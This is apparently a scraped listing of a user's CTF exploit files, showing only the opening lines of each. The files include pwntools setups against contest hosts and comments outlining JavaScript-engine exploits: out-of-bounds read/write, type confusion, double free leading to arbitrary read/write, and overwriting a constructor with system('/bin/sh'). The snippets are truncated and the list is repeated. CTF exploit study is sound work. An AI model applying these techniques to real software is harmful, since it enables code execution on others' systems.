Anand Balaji d4rk-kn1gh7

## cloudSettings
{"lastUpload":"2021-04-08T15:39:23.940Z","extensionVersion":"v3.4.3"}

## exp.py
#!/usr/bin/python3

from pwn import *
import sys

remote_ip, port = 'shapes-01.play.midnightsunctf.se', 1111
binary = './chall'
brkpts = '''
'''

## exp.py
#!/usr/bin/python

from pwn import *
import sys
import ctypes
from ctypes import *

remote_ip, port = 'liars.pwni.ng', 2018
binary = './liarmod'
brkpts = '''

## exp1.js
/*
Bug: typecasting uint8_t* ab.backingStore to uint16_t* ta.mem while converting ArrayBuffer to Uint16Array,
but not reducing length, allows oob r/w.

Exploit: create ArrayBuffer of same size as JSObject, so that they come consecutively in memory,
use oob r/w to overwrite JSObject metadata, construct arbitrary r/w primitives, overwrite
Array constructor with system, JSState with "/bin/sh"
*/

test = new ArrayBuffer(0x70);

## exp.js
// tl;dr : arbitrary type confusion by removing a CheckStructure node
// Full writeup coming soon :)

var tmp_buf = new ArrayBuffer(8)
var f64 = new Float64Array(tmp_buf)
var u32 = new Uint32Array(tmp_buf)
var BASE = 0x100000000

function f2i(f) {
    f64[0] = f

## exp.js
var tmp_buf = new ArrayBuffer(8)
var f64 = new Float64Array(tmp_buf)
var u32 = new Uint32Array(tmp_buf)
var BASE = 0x100000000

function f2i(f) {
    f64[0] = f
    return u32[0] + BASE*u32[1]
}
function i2f(i) {

## exp.js
var tmp_buf = new ArrayBuffer(8)
var f64 = new Float64Array(tmp_buf)
var u32 = new Uint32Array(tmp_buf)
var BASE = 0x100000000

function f2i(f) {
    f64[0] = f
    return u32[0] + BASE*u32[1]
}
function i2f(i) {

## exp.py
def tmp():

    new = 0x4eb9059
    new = 0x4eb9054
    new = 0x4eb905f
    new = 0x4eb006a
    new = 0x4eb905e
    new = 0x4eb3b6a
    new = 0x4eb9058
    new = 0x4eb006a

## exp.js
/*
tl;dr:
Double free an object (a), cause a JsObject (d) to overlap with a non-sparse array (c)
Use this to read addresses as strings, convert back to integers
Use shrstr in JsValue to overwrite array pointer for arbitrary r/w
*/

function hex(x) {
    return "0x" + x.toString(16)
}

## exp.js
let ab = new ArrayBuffer(8);
let f64a = new Float64Array(ab);
let u64a = new BigUint64Array(ab);
function f2i(v) {
    f64a[0] = v;
    return u64a[0];
}
function i2f(v) {
    u64a[0] = v;
    return f64a[0];
	#!/usr/bin/python3

	from pwn import *
	import sys

	remote_ip, port = 'shapes-01.play.midnightsunctf.se', 1111
	binary = './chall'
	brkpts = '''
	'''
	#!/usr/bin/python

	from pwn import *
	import sys
	import ctypes
	from ctypes import *

	remote_ip, port = 'liars.pwni.ng', 2018
	binary = './liarmod'
	brkpts = '''
	/*
	Bug: typecasting uint8_t* ab.backingStore to uint16_t* ta.mem while converting ArrayBuffer to Uint16Array,
	but not reducing length, allows oob r/w.

	Exploit: create ArrayBuffer of same size as JSObject, so that they come consecutively in memory,
	use oob r/w to overwrite JSObject metadata, construct arbitrary r/w primitives, overwrite
	Array constructor with system, JSState with "/bin/sh"
	*/

	test = new ArrayBuffer(0x70);
	// tl;dr : arbitrary type confusion by removing a CheckStructure node
	// Full writeup coming soon :)

	var tmp_buf = new ArrayBuffer(8)
	var f64 = new Float64Array(tmp_buf)
	var u32 = new Uint32Array(tmp_buf)
	var BASE = 0x100000000

	function f2i(f) {
	f64[0] = f
	def tmp():

	new = 0x4eb9059
	new = 0x4eb9054
	new = 0x4eb905f
	new = 0x4eb006a
	new = 0x4eb905e
	new = 0x4eb3b6a
	new = 0x4eb9058
	new = 0x4eb006a
	/*
	tl;dr:
	Double free an object (a), cause a JsObject (d) to overlap with a non-sparse array (c)
	Use this to read addresses as strings, convert back to integers
	Use shrstr in JsValue to overwrite array pointer for arbitrary r/w
	*/

	function hex(x) {
	return "0x" + x.toString(16)
	}
	let ab = new ArrayBuffer(8);
	let f64a = new Float64Array(ab);
	let u64a = new BigUint64Array(ab);
	function f2i(v) {
	f64a[0] = v;
	return u64a[0];
	}
	function i2f(v) {
	u64a[0] = v;
	return f64a[0];